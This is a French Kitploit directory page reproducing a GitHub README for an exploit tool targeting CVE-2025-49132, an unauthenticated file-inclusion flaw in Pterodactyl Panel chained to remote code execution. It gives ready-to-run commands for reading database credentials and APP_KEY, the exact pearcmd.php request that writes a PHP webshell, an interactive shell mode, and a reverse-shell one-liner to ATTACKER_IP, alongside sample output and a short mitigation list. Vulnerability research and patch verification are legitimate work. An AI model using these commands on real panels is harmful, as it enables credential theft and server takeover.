Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49132 — CVE pour Pterodactyl (pour l'étude et l'éducation) | Kitploit
Outils/GitHubGitHub/popyue/cve-2025-49132
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubpopyue/cve-2025-49132

CVE-2025-49132

CVE pour Pterodactyl (pour l'étude et l'éducation)

Voir le dépôt
412il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-49132 - Exploit du Panel Pterodactyl

⚠️ Avertissement : Ce dépôt est créé à des fins éducatives et de recherche uniquement dans le cadre de ma recherche en sécurité pour comprendre et documenter la CVE-2025-49132. Tout le crédit pour la découverte de la vulnérabilité revient au(x) chercheur(s) original(aux).

  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

        Panel Pterodactyl - Exploit LFI non authentifié vers RCE

📋 Description

CVE-2025-49132 est une vulnérabilité d'inclusion locale de fichier (LFI) non authentifiée dans le Panel Pterodactyl qui peut être escaladée en exécution de code à distance (RCE) via pearcmd.php de PHP.

La vulnérabilité existe dans le point d'accès /locales/locale.json, qui ne nettoie pas correctement les paramètres locale et namespace, permettant à un attaquant de lire des fichiers de configuration PHP arbitraires et d'obtenir une exécution de code.

🎯 Versions concernées

StatutVersion
❌ Vulnérable<= 1.11.10
✅ Corrigé>= 1.11.11

⚡ Fonctionnalités

  • Mode LFI : Lire les fichiers de configuration PHP (identifiants de base de données, APP_KEY, etc.)
  • Mode RCE : Exécution de code à distance via la technique LFI2RCE avec pearcmd.php
  • Shell interactif : Shell persistant pour l'exécution de multiples commandes
  • Commande unique : Exécution de commande en un seul clic
  • Sortie jolie : Sortie formatée avec codes couleur pour une meilleure lisibilité

📦 Installation

# Cloner le dépôt
git clone https://github.com/YOUR_USERNAME/CVE-2025-49132.git
cd CVE-2025-49132

# Installer les dépendances
pip install requests

Prérequis

  • Python 3.6+
  • Bibliothèque requests
  • curl (pour le mode RCE)

🚀 Utilisation

LFI - Lire les fichiers de configuration

# Lire la configuration de la base de données
python exploit.py -u http://target.com --read -p ../../config -f database

# Lire la configuration de l'application (contient APP_KEY)
python exploit.py -u http://target.com --read -p ../../config -f app

# Lire d'autres configurations
python exploit.py -u http://target.com --read -p ../../config -f auth
python exploit.py -u http://target.com --read -p ../../config -f session
python exploit.py -u http://target.com --read -p ../../config -f mail

RCE - Exécution de code à distance

# Exécution d'une commande unique
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "id"
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "whoami"

# Mode shell interactif
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR

# Shell inversé
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Chemins PEAR courants

DistributionChemin
Debian/Ubuntu../../../../../../usr/share/php
SUSE/OpenSUSE../../../../../../usr/share/php/PEAR
CentOS/RHEL../../../../../../usr/share/pear
Alpine../../../../../../usr/share/php8

📖 Arguments

ArgumentDescription
-u, --urlURL cible (obligatoire)
-p, --pathChemin de traversée pour LFI ou chemin PEAR pour RCE
-f, --fileFichier PHP à lire (sans l'extension .php)
--readActiver le mode lecture LFI
--rceActiver le mode RCE
--cmdCommande à exécuter (mode exécution unique)
--sdirRépertoire pour écrire le shell (par défaut : /tmp)
--snameNom du fichier shell (par défaut : shell)

🔬 Comment ça fonctionne

LFI (Inclusion locale de fichier)

Le point d'accès vulnérable /locales/locale.json accepte les paramètres locale et namespace :

GET /locales/locale.json?locale=../../config&namespace=database

Cela permet de lire tout fichier PHP qui retourne un tableau, y compris les fichiers de configuration Laravel.

RCE (Exécution de code à distance)

L'exploit enchaîne LFI avec pearcmd.php pour obtenir une RCE :

  1. Étape 1 : Utiliser la commande config-create de pearcmd.php pour écrire un webshell PHP

    /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system(...)?>+/tmp/shell.php
    
  2. Étape 2 : Inclure le shell écrit via LFI

    /locales/locale.json?locale=../../../../../../tmp&namespace=shell&c=<hex_encoded_cmd>
    

📸 Captures d'écran

LFI - Lecture de la configuration de la base de données

════════════════════════════════════════════════════════════
  CONFIGURATION DE LA BASE DE DONNÉES
════════════════════════════════════════════════════════════

  default: mysql
  connections:
    mysql:
      driver: mysql
      host: 127.0.0.1
      port: 3306
      database: panel
      username: pterodactyl
      password: SecretPassword123

────────────────────────────────────────────────────────────
[+] Configuration extraite avec succès !

RCE - Exécution de commande

[*] Cible : http://panel.example.com
[*] Exécution de la commande : id
[*] Écriture du payload dans : /tmp/cmd_abc123.php
[+] Sortie :
----------------------------------------
uid=474(wwwrun) gid=477(www) groups=477(www)
----------------------------------------

🛡️ Mitigation

  1. Mettre à jour le Panel Pterodactyl vers la version 1.11.11 ou ultérieure
  2. Mettre en place une validation d'entrée correcte sur les paramètres locale et namespace
  3. Utiliser une liste blanche pour les valeurs valides de locale/namespace
  4. Restreindre la directive register_argc_argv de PHP

⚠️ Avertissement

Cet outil est fourni uniquement à des fins de tests de sécurité éducatifs et autorisés.

  • Utilisez cet outil uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite
  • L'accès non autorisé à des systèmes informatiques est illégal
  • L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil

Utilisez-le de manière responsable et éthique.

📚 Références

  • Site officiel de Pterodactyl Panel
  • GitHub de Pterodactyl Panel
  • Détails sur CVE-2025-49132
  • CVE-2025-49132 : Pterodactyl Panel permet une exécution de code à distance non authentifiée et arbitraire
  • Technique PEAR LFI vers RCE
  • Générateur de chaîne de filtres PHP
  • De l'inclusion locale de fichier à l'exécution de code à distance (RCE)

📝 Journal des modifications

  • v1.0.0 - Version initiale
    • Lecture des configurations LFI
    • RCE via pearcmd
    • Mode shell interactif
    • Sortie formatée avec style

⭐ Mettez une étoile à ce dépôt si vous l'avez trouvé utile !

Télécharger l’outil